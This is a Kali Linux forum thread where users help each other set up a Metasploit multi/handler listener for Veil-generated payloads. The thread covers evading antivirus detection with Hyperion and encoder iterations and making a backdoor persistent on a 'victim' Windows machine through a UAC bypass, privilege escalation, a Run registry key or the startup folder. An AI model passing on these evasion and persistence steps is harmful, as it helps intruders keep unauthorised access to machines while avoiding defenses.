Veil and SET integration

[xerxes]

Hi all,

First of all thanks R.3volv3.R for guiding me to use Veil.

Well I created the payload by Veil.Then I went to run a listener by SET on Kali.I go through the following path:
se-toolkit -->social- engineering-->Attacks->create a payload and listener-->Import your own executable --->path to your executable --->start the listener

Then I get this error:

[!] Something went wrong , printing the error :name ' listen_path' is not defined.

What is wrong with my prcedure?
Generally is it possible to run a listener without creating a payload by SET? or should I use something else, for example "nc" ?

Thanks for your helps,

[lawrencethepentester]

try msfcli options E

[R.3volv3.R]

just run ~#: msfcli exploit/multi/handler LHOST=youripOnVeilSettingl LPORT=yourportOnVeilSetting E [enter]

[xerxes]

Thanks a lot R.3volv3.R...now It does work.

I did run "persistence" to make a backdoor on victim.It ctreated a .vbs file, unfortunately AV(NOD32) detects it.
Is it possible to change the file type or another trick in order to evade AV?

Best,

[wurmt0ngue]

this is the first Ive heard of Viel, how does it compare with using something like hyperion? I think hyperion has 100% success rate with bypassing av.

[xerxes]

The .exe file created by Veil does bypass AV too.The problem is after making backdoor( run persistence), result a .vbs file.This .vbs is detected by AV.
I'm going for Hyperion hope to solve the problem.

[wurmt0ngue]

The .exe file created by Veil does bypass AV too.The problem is after making backdoor( run persistence), result a .vbs file.This .vbs is detected by AV.
I'm going for Hyperion hope to solve the problem.

I just did a test with Hyperion and its sitting at about 12/45 detected on virus total (shakita 20 iterations + hyperion, backdoored in an existing exe), 19/45 if its just a plain meterpreter payload encoded into an exe and then run through hyperion)

I haven't checked persistence but if the persistence module always creats the .vbs file, the initial encoding wont matter. Its that persistence module is creating a new file, and thats what is being detected. Hyperion at least may up the success rate of the initial exe though.

[xerxes]

Exactly.May be There would be a way to force persistence module to create another type of file except .vbs.Any suggestions?
Veil also uses pyherion as ecncrypter while making payload.

[zimmaro]

Exactly.May be There would be a way to force persistence module to create another type of file except .vbs.Any suggestions?
Veil also uses pyherion as ecncrypter while making payload.

if your ""victims "" are windows-machine for persistence run another ways:
1) stupid_basic....&..more... but effective ...upload the same payload (created previously &tested..with veil.py )...in windows AUTOSTART folder

2) Technic-way...(i think)
after have a meterpreter:
-if windows-machine have enable UAC ....bypass it.....
-get administrator privileges (privilege-escalation).....
-interact with windows\system32.....
-add a new-viral-key/process in.... HKLM\\software\\microsoft\\windows\\currentversion \\run

bye

[zimmaro]

if your ""victims "" are windows-machine for persistence run another ways:
1) stupid_basic....&..more... but effective ...upload the same payload (created previously &tested..with veil.py )...in windows AUTOSTART folder

2) Technic-way...(i think)
after have a meterpreter:
-if windows-machine have enable UAC ....bypass it.....
-get administrator privileges (privilege-escalation).....
-interact with windows\system32.....
-add a new-viral-key/process in.... HKLM\\software\\microsoft\\windows\\currentversion \\run

bye

auto-quote
i "replace" & old test ....&&..seems to work fine NOW......versus my AV && add a Persistence-part
if you want to watch :
http://vimeo.com/72131516
bye

[xerxes]

Thank you zimmaro for the link, great and useful clips.Though I have got a problem by running SSLStrip on easy-creds.
By the way what video capturing program do use for the clips?

Regards,

[zimmaro]

Thank you zimmaro for the link, great and useful clips.Though I have got a problem by running SSLStrip on easy-creds.
By the way what video capturing program do use for the clips?

Regards,

camtasia studio (v7).....for easy-creds you have opened another thread :http://forums.kali.org/showthread.ph...p-pane-missing

[xerxes]

Thanks.Yes, and I'm waiting for suggestions...

[xerxes]

Thanks Zimmaro,

The problem is after restarting system, the payload(.exe file) does run before network interface comming up,so no connection can be established.Is there any solution for solving this, for example giving running delay to .exe file ? or making the .exe file to run itself again and again until get connected?

Regards,

[xerxes]

auto-quote
i "replace" & old test ....&&..seems to work fine NOW......versus my AV && add a Persistence-part
if you want to watch :
http://vimeo.com/72131516
bye

Thanks Zimmaro,

The problem is after restarting system, the payload(.exe file) does run before network interface comming up,so no connection can be established.Is there any solution for solving this, for example giving running delay to .exe file ? or making the .exe file to run itself again and again until get connected?

Regards,

[zimmaro]

Thanks Zimmaro,

The problem is after restarting system, the payload(.exe file) does run before network interface comming up,so no connection can be established.Is there any solution for solving this, for example giving running delay to .exe file ? or making the .exe file to run itself again and again until get connected?

Regards,

i THINK (my stupid-opinion)..one of the ways is ..you need a .bat file .INTO ..set delay for execute command (payloads) >>compile .bat +add payloads>>>.exe

now i'm NOT tested it ...but for my stupid-mind is ..possible
bye

[gnorr4]

Hey everyone,

When I copy the bypassuac.exe or any file other than the veil generated payload, the AV detects it.
My question is: How could I encrypt a custom .exe (bypassuac, for example) so it wouldn't be detected by the AV? Can I use Veil for that (probably not)? I've poked around the web searching for alternatives but all the ones I found relate to "Crypters" that loose they're efficiency after a couple of weeks, nothing like Veil (by the way, congratulations to the creators of such an amazing tool)

[Tankr32]

Hello i have a question about Veil evasion/ catapult/ pillage

I have a machine that i am trying to play with on my network and im trying to launch a payload using veil pillage. I don't have a password set up on this machine but i cant figure out to attack this machine because it doesn't have a log in pass. but every time i go to launch a payload it asks for login credentials and it wont let me leave the pass/ hash field blank any help would be great thanks